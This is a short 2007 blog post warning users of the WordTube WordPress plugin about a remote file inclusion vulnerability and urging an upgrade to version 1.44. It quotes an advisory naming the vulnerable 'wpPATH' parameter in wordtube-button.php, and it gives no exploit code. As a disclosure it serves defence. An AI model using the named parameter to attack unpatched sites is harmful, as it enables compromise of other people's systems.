May 14, 2007 - Comments Off on WordTube Exploit
WordTube Exploit
If you're using the WordTube extension for WordPress , haven't been hacked yet, and haven't heard about the remote code execution vulnerability, then you're very lucky and should read on.
The Problem
The following critical problem affects every version of WordTube prior to 1.44. From Secunia:
M.Hasran Addahroni has reported a vulnerability in the wordTube plugin for WordPress, which can be exploited by malicious people to disclose sensitive information or to compromise a vulnerable system.
Input passed to the "wpPATH" parameter in wordtube-button.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources.
Solution
Upgrade to version 1.44 immediately!
Jeffrey Barke is senior developer and information architect at theMechanism, a maxi-media firm in New York City and London.
Published by: jeffreybarke in The Programming Mechanism
Comments are closed.